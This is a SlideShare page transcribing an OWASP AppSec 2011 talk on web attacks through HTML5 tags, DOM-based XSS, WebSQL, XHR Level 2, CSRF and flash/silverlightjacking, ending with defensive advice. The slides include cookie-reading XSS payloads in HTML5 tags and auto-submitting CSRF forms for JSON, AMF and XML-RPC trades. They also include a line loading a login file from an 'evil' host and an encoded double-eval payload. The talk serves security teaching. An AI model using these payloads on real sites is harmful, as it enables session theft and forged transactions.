SlideShare a Scribd company logo

Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)

Shreeraj Shah
Shreeraj Shah

Browsers are escalating their feature set to accommodate new specifications like HTML 5, XHR Level 2 and DOM Level 3. It is forming the backbone of next generation applications running on mobile, PDA devices or desktops. The blend of DOM (Remote Execution stack) , XHR L2 (Sockets for injections) and HTML5 (Exploit delivery platform) is becoming an easy victim for attackers and worms. We have already witnessed these types of attacks on popular sites like Twitter, Facebook and Yahoo. It is of the essence to understand attack surface and vectors to protect next generation applications. We have an enormous expansion of attack surface after inclusion of features like audio/video tags, drag/drop APIs, CSS-Opacity, localstorage, web workers, DOM selectors, Mouse gesturing, native JSON, Cross Site access controls, offline browsing, etc. This extension of attack surface and exposure of server side APIs allow attacker to perform following lethal attacks and abuses. XHR abuse with attacking Cross Site access controls using level 2 calls JSON manipulations and poisoning DOM API injections and script executions Abusing HTML5 tag structure and attributes Localstorage manipulation and foreign site access Attacking client side sandbox architectures DOM scrubbing and logical abuse Browser hijacking and exploitation through advanced DOM features One-way CSRF and abusing vulnerable sites DOM event injections and controlling (Clickjacking) Hacking widgets, mashups and social networking sites Abusing client side Web 2.0 and RIA libraries We will be covering the above attacks and their variants in detail along with some real life cases and demonstrations. It is also important to understand methods of discovering these types of vulnerabilities across the application base. We will see some new scanning tools and approaches to identify some of these key issues.

Technology
1 of 66
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2) Shreeraj Shah Blueinfy Solutions Pvt. Ltd. shreeraj.shah@blueinfy.net OWASP 22nd Sept. 2011 OWASP AppSec USA 2011 Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation http://www.owasp.org
http://shreeraj.blogspot.com shreeraj@blueinfy.com Who Am I? http://www.blueinfy.com Founder & Director Blueinfy Solutions Pvt. Ltd. SecurityExposure.com Past experience Net Square (Founder), Foundstone (R&D/Consulting), Chase(Middleware), IBM (Domino Dev) Interest Web security research Published research Articles / Papers – Securityfocus, O’erilly, DevX, InformIT etc. Tools – wsScanner, scanweb2.0, AppMap, AppCodeScan, AppPrint etc. Advisories - .Net, Java servers etc. Presented at Blackhat, RSA, InfoSecWorld, OSCON, OWASP, HITB, Syscan, DeepSec etc. Books (Author) Web 2.0 Security – Defending Ajax, RIA and SOA Hacking Web Services Web Hacking OWASP 2
Agenda Next Generation Application’s Attack Surface and Threat Model HTML 5 – Tags, Storage & WebSQL DOM – Vulnerabilities & Exploits Abusing Sockets, XHR & CSRF ClickJacking & Exploting Rich HTML Components Reverse Engineering across DOM OWASP 3
ATTACK SURFACE AND THREAT MODEL OWASP 4
Real Life Cases Last three years – several application reviewed (Banking, Trading, Portals, Web 2.0 sites etc…) Interesting outcomes and stats Auto scanning is becoming increasingly difficult and impossible in some cases Sites are vulnerable and easily exploitable in many cases OWASP 5
Technology Shift & Trend • Android • iPhone/Pad • HTML 5 Other • • Storage • Flash Mobile • AMF • WebSocket • DOM • WebSQL • JS • Storage• Flex • XHR • XAML Server side Components • Silverlight • WCF Presentation Layer • NET Business Layer Client side Data Access Layer Components Authentication (Browser) Communication etc. Runtime, Platform, Operating System Components OWASP 6
Browser Model Mobile HTML5 Silverlight Flash Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Storage XHR WebSocket Plug-in Sockets Browser Native Network Services Network & Access Same Origin Policy (SOP) Sandbox Core Policies OWASP 7 7
Layers Presentation HTML5 Silverlight Flash/Flex Process & Logic JavaScript, Document Object Model (DOM - 3), Events, Parsers/Threads etc. Network & Access XHR – Level 2 WebSockets Plugin-Sockets Core Policies SOP Sandboxing for iframe Shared Resources OWASP 8
Application Architecture Trading Weather Ajax Email RIA (Flash) Banking HTML / JS / DOM End Client Browser Blog Stack Internet Internet Web Services Web Server Data-access Application Server Database Auth. Access Authentication Server OWASP 9
Attack Surface Expansion JSON/XML streams POST name HTTP Response and value pairs variables XML/JSON QueryString etc. Ajax RIA (Flash) HTTP variables Cookie etc. DOM calls/events HTML / JS / DOM File attachments uploads etc. API - streams Open APIs and Feeds and other integrated streams party information OWASP 1 10 0
AppSec dynamics Source - OWASP OWASP 11 11
Integration and Communications DOM glues everything – It integrates Flex, Silverlight and HTML if needed Various ways to communicate – native browser way, using XHR and WebSockets Options for data sharing – JSON, XML, WCF, AMF etc. (many more) Browsers are supporting new set of technologies and exposing the surface OWASP 12
Demos App using DOM, AJAX and Web Services HTML 5 components and usage Fingerprinting Application Assets from DOM or JavaScripts Frameworks, Scripts, Structures, and so on – DWR/Struts OWASP 13
Threat Model Sandbox attacks 7 1 XSS abuse with 8 Abusing new features and ClickJacking tags and attributes like drag-and-drop Events Tags & Attributes Thick Features Presentation Injecting and Exploiting WebSQL WebSQL DOM Storage 4 3 Stealing from 2 DOM based XSS the storage Parser/Threads Process & Logic and Redirects 5 XHR WebSocket Plug-in Sockets Abusing network Network API and Sockets Browser Native Network Services & Access CSRF 6 Core across streams Same Origin Policy (SOP) Sandbox Policies 9 Threats to widgets Botnet/Spynet using 10 OWASP WebWorkers 14 and mashups
Mapping top 10 – Current Context A1 – Injection: JSON, AMF, WCF, XML Injection along with WebSQL. A2 – XSS : DOM based XSS, Script injection through , Direct third party streams, HTML5 tags A3 – Broken Authentication and Session Management: Reverse Engineering Authentication/Authorization logic (JS, Flash or Silverlight) & LocalStorage A4 – Insecure Direct Object Referencing : Insecure Data Access Level calls from browser. A5 – CSRF: CSRF with XML, JSON and AMF streams and XHR (SOP and Sharing) A6 – Security Misconfiguration : Insecure browsers, poor policies, trust model A7 – Failure to restrict URL Access : Hidden URL and resource-fetching from reverse engineering A8 – Unvalidated Redirects : DOM-based redirects and spoofing A9 – Insecure Crypto Storage : Local storage inside browser and Global variables A10 – Insufficient Transport Layer Protection : Ajax and other calls going over non-SSL channels. Mobile 10 … OWASP 15
HTML 5 – TAGS, STORAGE & WEBSQL OWASP 1 16 6
Abusing HTML 5 Tags Various new tags and can be abused, may not be filtered or validated Media tags <video poster=javascript:alert(document.cookie)// <audio><source onerror="javascript:alert(document.cookie)"> Form tags <form><button formaction="javascript:alert(document.cookie)">foo <body oninput=alert(document.cookie)><input autofocus> OWASP 17
Attacking Storage HTML 5 is having local storage and can hold global scoped variables http://www.w3.org/TR/webstorage/ OWASP 18
Attacking Storage It is possible to steal them through XSS or via JavaScript getItem and setItem calls XSS the box and scan through storage OWASP 19
DOM Storage Applications run with “rich” DOM JavaScript sets several variables and parameters while loading – GLOBALS It has sensitive information and what if they are GLOBAL and remains during the life of application It can be retrieved with XSS HTTP request and response are going through JavaScripts (XHR) – what about those vars? OWASP 20
What is wrong? OWASP 21
By default its Global Here is the line of code temp = "login.do?user="+user+"&pwd="+pwd; xmlhttp.open("GET",temp,true); xmlhttp.onreadystatechange=function() OWASP 22
DOM stealing It is possible to get these variables and clear text information – user/pass Responses and tokens Business information XHR calls and HTTP request/responses Dummy XHR object injection Lot of possibilities for exploitation OWASP 23
Demo DOMTracer and profiling Accessing username and password OWASP 24
SQL Injection WebSQL is part of HTML 5 specification, it provides SQL database to the browser itself. Allows one time data loading and offline browsing capabilities. Causes security concern and potential injection points. Methods and calls are possible OWASP 25
SQL Injection Through JavaScript one can harvest entire local database. Example OWASP 26
DOM – VULNERABILITIES & EXPLOITS OWASP 27
DOM Architecture OWASP 28
DOM Calls Ajax/Flash/Silverlight – Async Calls HTML / CSS / RIA Database / Resource JS / DOM XML / Middleware / Text XMLHttpRequest (XHR) Web Server Asynchronous over HTTP(S) OWASP 29
DOM Calls JSON XML JS-Script JS-Object JS-Array OWASP 30
DOM based XSS It is a sleeping giant in the Ajax applications Root cause DOM is already loaded Application is single page and DOM remains same New information coming needs to be injected in using various DOM calls like eval() Information is coming from untrusted sources OWASP 31
Example cases Various different way DOM based XSS can take place Example Simple DOM function using URL to process ajax calls Third party content going into existing DOM and call is not secure Ajax call from application, what if we make a direct call to the link – JSON may cause XSS OWASP 32
DOM based URL parsing Ajax applications are already loaded and developers may be using static function to pass arguments from URL For example hu = window.location.search.substring(1); Above parameter is going to following ajax function eval('getProduct('+ koko.toString()+')'); DOM based XSS OWASP 33
Demo Scanning with DOMScan Injecting payload in the call OWASP 34
Third Party Streaming Documents Attacker News Weather Mails Bank/Trade Browser Internet RSS feeds Ajax RIA (Flash/Silver) Internet App HTML / JS / DOM Blog Database Authentication Stream Application Infrastructure eval() Web Services End point XSS OWASP 35
Stream processing if (http.readyState == 4) { var response = http.responseText; var p = eval("(" + response + ")"); document.open(); document.write(p.firstName+"<br>"); document.write(p.lastName+"<br>"); document.write(p.phoneNumbers[0]); document.close(); OWASP 36
Polluting Streams XML/ JS-Object / JS-Array / JS-Script / JSON attacker 8008 proxy Web app DB Web Server Web app DB Web app Stream Web Client eval() XSS OWASP 37
Exploiting DOM calls document.write(…) document.writeln(…) document.body.innerHtml=… document.forms[0].action=… Example of vulnerable document.attachEvent(…) Calls document.create…(…) document.execCommand(…) document.body. … window.attachEvent(…) document.location=… document.location.hostname=… document.location.replace(…) document.location.assign(…) document.URL=… window.navigate(…) OWASP 38
Demo Sample call demo DOMScan to identify vulnerability OWASP 39
Direct Ajax Call Ajax function would be making a back-end call Back-end would be returning JSON stream or any other and get injected in DOM In some libraries their content type would allow them to get loaded in browser directly In that case bypassing DOM processing… OWASP 40
Demo DWR/JSON call – bypassing and direct stream access OWASP 41
ABUSING SOCKETS, XHR & CSRF OWASP 42
Abusing network calls HTML 5 provides WebSocket and XHR Level 2 calls It allows to make cross domains call and raw socket capabilities It can be leveraged by JavaScript payload Malware or worm can use it to perform several scanning tasks OWASP 43
Internal Scanning Allows internal scanning, setting backward hidden channel, opening calls to proxy/cache. Some browsers have blocked these calls for security reason. OWASP 44
XHR/CSRF ETC. OWASP 45
XHR – Level 2 calls XHR is now level 2 on browser Various browser behavior is different XHR is already implemented Shared resource policy implemented “orgin” and “access-*” tags and decisions based on that Potential abuses One way stealth channel CSRF possible (no cookie though) Header changes CROS - http://www.w3.org/TR/cors/ (Cross Origin Request Sharing) OWASP 46
CSRF CSRF is possible with Web 2.0 streams by abusing DOM calls XML manipulations CSRF with JSON AMX is also XML stream Attacker injects simple HTML payload Initiate a request from browser to target cross domain OWASP 47
How it works? OWASP 48
JSON <html> <body> <FORM NAME="buy" ENCTYPE="text/plain" action="http://192.168.100.101/json/jservice.ashx" METHOD="POST"> <input type="hidden" name='{"id":3,"method":"getProduct","params":{ "id" : 3}}' value='foo'> </FORM> <script>document.buy.submit();</script> </body> </html> OWASP 49
HTTP Req. POST /json/jservice.ashx HTTP/1.1 Host: 192.168.100.2 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Content-Type: text/plain Content-Length: 57 {"id":3,"method":"getProduct","params":{ "id" : 3}}=foo OWASP 50
HTTP Resp. HTTP/1.1 200 OK Date: Sat, 17 Jul 2010 09:14:44 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/plain; charset=utf-8 Content-Length: 1135 {"id":3,"result":{"Products":{"columns":["product_id","product_name","product_desc_summary","product_desc","product_price","image _path","rebates_file"],"rows":[[3,"Doctor Zhivago","Drama / Romance","David Lean's DOCTOR ZHIVAGO is an exploration of the Russian Revolution as seen from the point of view of the intellectual, introspective title character (Omar Sharif). As the political landscape changes, and the Czarist regime comes to an end, Dr. Zhivago's relationships reflect the political turmoil raging about him. Though he is married, the vagaries of war lead him to begin a love affair with the beautiful Lara (Julie Christie). But he cannot escape the machinations of a band of selfish and cruel characters: General Strelnikov (Tom Courtenay), a Bolshevik General; Komarovsky (Rod Steiger), Lara's former lover; and Yevgraf (Alec Guinness), Zhivago's sinister half-brother. This epic, sweeping romance, told in flashback, captures the lushness of Moscow before the war and the violent social upheaval that followed. The film is based on the Pulitzer Prize-winning novel by Boris Pasternak.",10.99,"zhivago","zhivago.html"]]}}} OWASP 51
AMF <html> <body> <FORM NAME="buy" ENCTYPE="text/plain" action="http://192.168.100.101:8080/samples/messagebroker/http" METHOD="POST"> <input type="hidden" name='<amfx ver' value='"3" xmlns="http://www.macromedia.com/2005/amfx"><body><object type="flex.messaging.messages.CommandMessage"><traits><string>body</string ><string>clientId</string><string>correlationId</string><string>destination</strin g><string>headers</string><string>messageId</string><string>operation</string ><string>timestamp</string><string>timeToLive</string></traits><object><traits /></object><null/><string/><string/><object><traits><string>DSId</string><str ing>DSMessagingVersion</string></traits><string>nil</string><int>1</int></obje ct><string>68AFD7CE-BFE2-4881-E6FD- 694A0148122B</string><int>5</int><int>0</int><int>0</int></object></body> </amfx>'> </FORM> <script>document.buy.submit();</script> </body> </html> OWASP 52
XML <html> <body> <FORM NAME="buy" ENCTYPE="text/plain" action="http://trade.example.com/xmlrpc/trade.rem" METHOD="POST"> <input type="hidden" name='<?xml version' value='"1.0"?><methodCall><methodName>stocks.buy</methodN ame><params><param><value><string>MSFT</string></value> </param><param><value><double>26</double></value></para m></params></methodCall>'> </FORM> <script>document.buy.submit();</script> </body> </html> OWASP 53
Demos Simple trade demo – XML-RPC call CSRF. OWASP 54
FLASHJACKING OWASP 55
Flashjacking It is possible to have some integrated attacks DOM based XSS CSRF Flash DOM based issue can change flash/swf file – it can be changed at run time – user will not come to know .. Example document.getElementsByName(“login").item(0).src = "http://evil/login.swf" OWASP 56
Double eval – eval the eval Payload - document.getElementsByName('Login').item(0 ).src='http://192.168.100.200:8080/flex/Login n/Loginn.swf‘ Converting for double eval to inject ‘ and “ etc… eval(String.fromCharCode(100,111,99,117,109,101,110,116,4 6,103,101,116,69,108,101,109,101,110,116,115,66,121,78,97 ,109,101,40,39,76,111,103,105,110,39,41,46,105,116,101,10 9,40,48,41,46,115,114,99,61,39,104,116,116,112,58,47,47,49 ,57,50,46,49,54,56,46,49,48,48,46,50,48,48,58,56,48,56,48,4 7,102,108,101,120,47,76,111,103,105,110,110,47,76,111,103 ,105,110,110,46,115,119,102,39)) OWASP 57
silvelightjacking It is possible to have some integrated attacks DOM based XSS CSRF Silvelight files DOM based issue can change xap file – it can be changed at run time – user will not come to know .. Example document.getElementsByName(“login").item(0).src = "http://evil/login.xap" OWASP 58
RICH HTML COMPONENTS OWASP 59
Widgets Widgets/Gadgets/Modules – popular with Web 2.0 applications Small programs runs under browser JavaScript and HTML based components In some cases they share same DOM – Yes, same DOM It can cause a cross widget channels Exploitable … OWASP 60
Cross DOM Access Widget 1 Widget 2 Widget 3 Email Widget RSS Feed Reader Attacker DOM – Shared DOM Setting the trap OWASP 61
DOM traps It is possible to access DOM events, variables, logic etc. Sandbox is required at the architecture layer to protect cross widget access Segregating DOM by iframe may help Flash based widget is having its own issues as well Code analysis of widgets before allowing them to load OWASP 62
Demo Cross Widget Spying Using DOMScan to review Widget Architecture and Access Mechanism RSS Feed Hacking Mashup Hacks Cross Domain Callback Hacking OWASP 63
DEFENDING APPLICATIONS OWASP 64
Security at CODE Level JS, Flash or XAP should not have server side logic – should be presentation layer only … Obfuscation may help a bit – not full proof. Source code and object code analysis during blackbox testing would require Resource discoveries and fuzzing – a must for SOAP, JSON and AMF streams Careful with HTML 5 implementation DOM based scanning and analysis is required Cross streams and third party analytics OWASP 65
http://shreeraj.blogspot.com shreeraj@blueinfy.com http://www.blueinfy.com CONCLUSION AND QUESTIONS OWASP 66

Recommended

VPC Design Scenarios for Real-Life Use Cases (NET320) - AWS re:Invent 2018
VPC Design Scenarios for Real-Life Use Cases (NET320) - AWS re:Invent 2018VPC Design Scenarios for Real-Life Use Cases (NET320) - AWS re:Invent 2018
VPC Design Scenarios for Real-Life Use Cases (NET320) - AWS re:Invent 2018Amazon Web Services
 
PCI & Serverless - Everything you need to know
PCI & Serverless - Everything you need to knowPCI & Serverless - Everything you need to know
PCI & Serverless - Everything you need to knowPureSec
 
XSS and CSRF with HTML5
XSS and CSRF with HTML5XSS and CSRF with HTML5
XSS and CSRF with HTML5Shreeraj Shah
 
Architect proper segmentation for PCI DSS workloads on AWS - GRC306 - AWS re:...
Architect proper segmentation for PCI DSS workloads on AWS - GRC306 - AWS re:...Architect proper segmentation for PCI DSS workloads on AWS - GRC306 - AWS re:...
Architect proper segmentation for PCI DSS workloads on AWS - GRC306 - AWS re:...Amazon Web Services
 
Pentesting Rest API's by :- Gaurang Bhatnagar
Pentesting Rest API's by :- Gaurang BhatnagarPentesting Rest API's by :- Gaurang Bhatnagar
Pentesting Rest API's by :- Gaurang BhatnagarOWASP Delhi
 
XPATH, LDAP and Path Traversal Injection
XPATH, LDAP and Path Traversal InjectionXPATH, LDAP and Path Traversal Injection
XPATH, LDAP and Path Traversal InjectionBlueinfy Solutions
 
Breaking down the economics and tco of migrating to aws - Toronto
Breaking down the economics and tco of migrating to aws - TorontoBreaking down the economics and tco of migrating to aws - Toronto
Breaking down the economics and tco of migrating to aws - TorontoAmazon Web Services
 
AWS Security Best Practices in a Zero Trust Security Model - DEM08 - Toronto ...
AWS Security Best Practices in a Zero Trust Security Model - DEM08 - Toronto ...AWS Security Best Practices in a Zero Trust Security Model - DEM08 - Toronto ...
AWS Security Best Practices in a Zero Trust Security Model - DEM08 - Toronto ...Amazon Web Services
 

Recommended

VPC Design Scenarios for Real-Life Use Cases (NET320) - AWS re:Invent 2018
VPC Design Scenarios for Real-Life Use Cases (NET320) - AWS re:Invent 2018VPC Design Scenarios for Real-Life Use Cases (NET320) - AWS re:Invent 2018
VPC Design Scenarios for Real-Life Use Cases (NET320) - AWS re:Invent 2018Amazon Web Services
 
PCI & Serverless - Everything you need to know
PCI & Serverless - Everything you need to knowPCI & Serverless - Everything you need to know
PCI & Serverless - Everything you need to knowPureSec
 
XSS and CSRF with HTML5
XSS and CSRF with HTML5XSS and CSRF with HTML5
XSS and CSRF with HTML5Shreeraj Shah
 
Architect proper segmentation for PCI DSS workloads on AWS - GRC306 - AWS re:...
Architect proper segmentation for PCI DSS workloads on AWS - GRC306 - AWS re:...Architect proper segmentation for PCI DSS workloads on AWS - GRC306 - AWS re:...
Architect proper segmentation for PCI DSS workloads on AWS - GRC306 - AWS re:...Amazon Web Services
 
Pentesting Rest API's by :- Gaurang Bhatnagar
Pentesting Rest API's by :- Gaurang BhatnagarPentesting Rest API's by :- Gaurang Bhatnagar
Pentesting Rest API's by :- Gaurang BhatnagarOWASP Delhi
 
XPATH, LDAP and Path Traversal Injection
XPATH, LDAP and Path Traversal InjectionXPATH, LDAP and Path Traversal Injection
XPATH, LDAP and Path Traversal InjectionBlueinfy Solutions
 
Breaking down the economics and tco of migrating to aws - Toronto
Breaking down the economics and tco of migrating to aws - TorontoBreaking down the economics and tco of migrating to aws - Toronto
Breaking down the economics and tco of migrating to aws - TorontoAmazon Web Services
 
AWS Security Best Practices in a Zero Trust Security Model - DEM08 - Toronto ...
AWS Security Best Practices in a Zero Trust Security Model - DEM08 - Toronto ...AWS Security Best Practices in a Zero Trust Security Model - DEM08 - Toronto ...
AWS Security Best Practices in a Zero Trust Security Model - DEM08 - Toronto ...Amazon Web Services
 
02. input validation module v5
02. input validation module v502. input validation module v5
02. input validation module v5Eoin Keary
 
Click jacking
Click jackingClick jacking
Click jackingRonan Dunne, CEH, SSCP
 
Blind WAF identification
Blind WAF identificationBlind WAF identification
Blind WAF identificationMiroslav Stampar
 
Deploying critical Microsoft workloads on AWS at Capital One - SDD337 - AWS r...
Deploying critical Microsoft workloads on AWS at Capital One - SDD337 - AWS r...Deploying critical Microsoft workloads on AWS at Capital One - SDD337 - AWS r...
Deploying critical Microsoft workloads on AWS at Capital One - SDD337 - AWS r...Amazon Web Services
 
How to Prevent RFI and LFI Attacks
How to Prevent RFI and LFI AttacksHow to Prevent RFI and LFI Attacks
How to Prevent RFI and LFI AttacksImperva
 
Source Code Analysis with SAST
Source Code Analysis with SASTSource Code Analysis with SAST
Source Code Analysis with SASTBlueinfy Solutions
 
Introduction to GraphQL and AWS Appsync on AWS - iOS
Introduction to GraphQL and AWS Appsync on AWS - iOSIntroduction to GraphQL and AWS Appsync on AWS - iOS
Introduction to GraphQL and AWS Appsync on AWS - iOSAmazon Web Services
 
Amazon Cognito와 함께 서버리스를..! - 이재일 (강남비기너모임) :: AWS Community Day 2017
Amazon Cognito와 함께 서버리스를..! - 이재일 (강남비기너모임) :: AWS Community Day 2017Amazon Cognito와 함께 서버리스를..! - 이재일 (강남비기너모임) :: AWS Community Day 2017
Amazon Cognito와 함께 서버리스를..! - 이재일 (강남비기너모임) :: AWS Community Day 2017AWSKRUG - AWS한국사용자모임
 
Secure Coding principles by example: Build Security In from the start - Carlo...
Secure Coding principles by example: Build Security In from the start - Carlo...Secure Coding principles by example: Build Security In from the start - Carlo...
Secure Coding principles by example: Build Security In from the start - Carlo...Codemotion
 
Mastering the AWS SDK for PHP (TLS306) | AWS re:Invent 2013
Mastering the AWS SDK for PHP (TLS306) | AWS re:Invent 2013Mastering the AWS SDK for PHP (TLS306) | AWS re:Invent 2013
Mastering the AWS SDK for PHP (TLS306) | AWS re:Invent 2013Amazon Web Services
 
Identity and Access Management: The First Step in AWS Security
Identity and Access Management: The First Step in AWS SecurityIdentity and Access Management: The First Step in AWS Security
Identity and Access Management: The First Step in AWS SecurityAmazon Web Services
 
Evaluación y prácticas para migrar a la nube
Evaluación y prácticas para migrar a la nubeEvaluación y prácticas para migrar a la nube
Evaluación y prácticas para migrar a la nubeAmazon Web Services LATAM
 
Peeling the Onion: Making Sense of the Layers of API Security
Peeling the Onion: Making Sense of the Layers of API SecurityPeeling the Onion: Making Sense of the Layers of API Security
Peeling the Onion: Making Sense of the Layers of API SecurityMatt Tesauro
 
Xss ppt
Xss pptXss ppt
Xss pptpenetration Tester
 
Java Security Framework's
Java Security Framework'sJava Security Framework's
Java Security Framework'sMohammed Fazuluddin
 
HTML and Responsive Design
HTML and Responsive Design HTML and Responsive Design
HTML and Responsive Design Mindy McAdams
 
Web Services Hacking and Security
Web Services Hacking and SecurityWeb Services Hacking and Security
Web Services Hacking and SecurityBlueinfy Solutions
 
다양한 솔루션으로 만들어가는 AWS 네트워크 보안::이경수::AWS Summit Seoul 2018
다양한 솔루션으로 만들어가는 AWS 네트워크 보안::이경수::AWS Summit Seoul 2018다양한 솔루션으로 만들어가는 AWS 네트워크 보안::이경수::AWS Summit Seoul 2018
다양한 솔루션으로 만들어가는 AWS 네트워크 보안::이경수::AWS Summit Seoul 2018Amazon Web Services Korea
 
Network Security and Access Control within AWS
Network Security and Access Control within AWSNetwork Security and Access Control within AWS
Network Security and Access Control within AWSAmazon Web Services
 
WEBINAR: OWASP API Security Top 10
WEBINAR: OWASP API Security Top 10WEBINAR: OWASP API Security Top 10
WEBINAR: OWASP API Security Top 1042Crunch
 
Angularjs Basics
Angularjs BasicsAngularjs Basics
Angularjs BasicsAnuradha Bandara
 
MEAN Stack NYC Meetup 20150717: TDD Your AngularJS + Ionic Directives With jQ...
MEAN Stack NYC Meetup 20150717: TDD Your AngularJS + Ionic Directives With jQ...MEAN Stack NYC Meetup 20150717: TDD Your AngularJS + Ionic Directives With jQ...
MEAN Stack NYC Meetup 20150717: TDD Your AngularJS + Ionic Directives With jQ...Valeri Karpov
 

More Related Content

What's hot

02. input validation module v5
02. input validation module v502. input validation module v5
02. input validation module v5Eoin Keary
 
Deploying critical Microsoft workloads on AWS at Capital One - SDD337 - AWS r...
Deploying critical Microsoft workloads on AWS at Capital One - SDD337 - AWS r...Deploying critical Microsoft workloads on AWS at Capital One - SDD337 - AWS r...
Deploying critical Microsoft workloads on AWS at Capital One - SDD337 - AWS r...Amazon Web Services
 
How to Prevent RFI and LFI Attacks
How to Prevent RFI and LFI AttacksHow to Prevent RFI and LFI Attacks
How to Prevent RFI and LFI AttacksImperva
 
Source Code Analysis with SAST
Source Code Analysis with SASTSource Code Analysis with SAST
Source Code Analysis with SASTBlueinfy Solutions
 
Introduction to GraphQL and AWS Appsync on AWS - iOS
Introduction to GraphQL and AWS Appsync on AWS - iOSIntroduction to GraphQL and AWS Appsync on AWS - iOS
Introduction to GraphQL and AWS Appsync on AWS - iOSAmazon Web Services
 
Amazon Cognito와 함께 서버리스를..! - 이재일 (강남비기너모임) :: AWS Community Day 2017
Amazon Cognito와 함께 서버리스를..! - 이재일 (강남비기너모임) :: AWS Community Day 2017Amazon Cognito와 함께 서버리스를..! - 이재일 (강남비기너모임) :: AWS Community Day 2017
Amazon Cognito와 함께 서버리스를..! - 이재일 (강남비기너모임) :: AWS Community Day 2017AWSKRUG - AWS한국사용자모임
 
Secure Coding principles by example: Build Security In from the start - Carlo...
Secure Coding principles by example: Build Security In from the start - Carlo...Secure Coding principles by example: Build Security In from the start - Carlo...
Secure Coding principles by example: Build Security In from the start - Carlo...Codemotion
 
Mastering the AWS SDK for PHP (TLS306) | AWS re:Invent 2013
Mastering the AWS SDK for PHP (TLS306) | AWS re:Invent 2013Mastering the AWS SDK for PHP (TLS306) | AWS re:Invent 2013
Mastering the AWS SDK for PHP (TLS306) | AWS re:Invent 2013Amazon Web Services
 
Identity and Access Management: The First Step in AWS Security
Identity and Access Management: The First Step in AWS SecurityIdentity and Access Management: The First Step in AWS Security
Identity and Access Management: The First Step in AWS SecurityAmazon Web Services
 
Evaluación y prácticas para migrar a la nube
Evaluación y prácticas para migrar a la nubeEvaluación y prácticas para migrar a la nube
Evaluación y prácticas para migrar a la nubeAmazon Web Services LATAM
 
Peeling the Onion: Making Sense of the Layers of API Security
Peeling the Onion: Making Sense of the Layers of API SecurityPeeling the Onion: Making Sense of the Layers of API Security
Peeling the Onion: Making Sense of the Layers of API SecurityMatt Tesauro
 
HTML and Responsive Design
HTML and Responsive Design HTML and Responsive Design
HTML and Responsive Design Mindy McAdams
 
Web Services Hacking and Security
Web Services Hacking and SecurityWeb Services Hacking and Security
Web Services Hacking and SecurityBlueinfy Solutions
 
다양한 솔루션으로 만들어가는 AWS 네트워크 보안::이경수::AWS Summit Seoul 2018
다양한 솔루션으로 만들어가는 AWS 네트워크 보안::이경수::AWS Summit Seoul 2018다양한 솔루션으로 만들어가는 AWS 네트워크 보안::이경수::AWS Summit Seoul 2018
다양한 솔루션으로 만들어가는 AWS 네트워크 보안::이경수::AWS Summit Seoul 2018Amazon Web Services Korea
 
Network Security and Access Control within AWS
Network Security and Access Control within AWSNetwork Security and Access Control within AWS
Network Security and Access Control within AWSAmazon Web Services
 
WEBINAR: OWASP API Security Top 10
WEBINAR: OWASP API Security Top 10WEBINAR: OWASP API Security Top 10
WEBINAR: OWASP API Security Top 1042Crunch
 

What's hot (20)

02. input validation module v5
02. input validation module v502. input validation module v5
02. input validation module v5
 
Click jacking
Click jackingClick jacking
Click jacking
 
Blind WAF identification
Blind WAF identificationBlind WAF identification
Blind WAF identification
 
Deploying critical Microsoft workloads on AWS at Capital One - SDD337 - AWS r...
Deploying critical Microsoft workloads on AWS at Capital One - SDD337 - AWS r...Deploying critical Microsoft workloads on AWS at Capital One - SDD337 - AWS r...
Deploying critical Microsoft workloads on AWS at Capital One - SDD337 - AWS r...
 
How to Prevent RFI and LFI Attacks
How to Prevent RFI and LFI AttacksHow to Prevent RFI and LFI Attacks
How to Prevent RFI and LFI Attacks
 
Source Code Analysis with SAST
Source Code Analysis with SASTSource Code Analysis with SAST
Source Code Analysis with SAST
 
Introduction to GraphQL and AWS Appsync on AWS - iOS
Introduction to GraphQL and AWS Appsync on AWS - iOSIntroduction to GraphQL and AWS Appsync on AWS - iOS
Introduction to GraphQL and AWS Appsync on AWS - iOS
 
Amazon Cognito와 함께 서버리스를..! - 이재일 (강남비기너모임) :: AWS Community Day 2017
Amazon Cognito와 함께 서버리스를..! - 이재일 (강남비기너모임) :: AWS Community Day 2017Amazon Cognito와 함께 서버리스를..! - 이재일 (강남비기너모임) :: AWS Community Day 2017
Amazon Cognito와 함께 서버리스를..! - 이재일 (강남비기너모임) :: AWS Community Day 2017
 
Secure Coding principles by example: Build Security In from the start - Carlo...
Secure Coding principles by example: Build Security In from the start - Carlo...Secure Coding principles by example: Build Security In from the start - Carlo...
Secure Coding principles by example: Build Security In from the start - Carlo...
 
Mastering the AWS SDK for PHP (TLS306) | AWS re:Invent 2013
Mastering the AWS SDK for PHP (TLS306) | AWS re:Invent 2013Mastering the AWS SDK for PHP (TLS306) | AWS re:Invent 2013
Mastering the AWS SDK for PHP (TLS306) | AWS re:Invent 2013
 
Identity and Access Management: The First Step in AWS Security
Identity and Access Management: The First Step in AWS SecurityIdentity and Access Management: The First Step in AWS Security
Identity and Access Management: The First Step in AWS Security
 
Evaluación y prácticas para migrar a la nube
Evaluación y prácticas para migrar a la nubeEvaluación y prácticas para migrar a la nube
Evaluación y prácticas para migrar a la nube
 
Peeling the Onion: Making Sense of the Layers of API Security
Peeling the Onion: Making Sense of the Layers of API SecurityPeeling the Onion: Making Sense of the Layers of API Security
Peeling the Onion: Making Sense of the Layers of API Security
 
Xss ppt
Xss pptXss ppt
Xss ppt
 
Java Security Framework's
Java Security Framework'sJava Security Framework's
Java Security Framework's
 
HTML and Responsive Design
HTML and Responsive Design HTML and Responsive Design
HTML and Responsive Design
 
Web Services Hacking and Security
Web Services Hacking and SecurityWeb Services Hacking and Security
Web Services Hacking and Security
 
다양한 솔루션으로 만들어가는 AWS 네트워크 보안::이경수::AWS Summit Seoul 2018
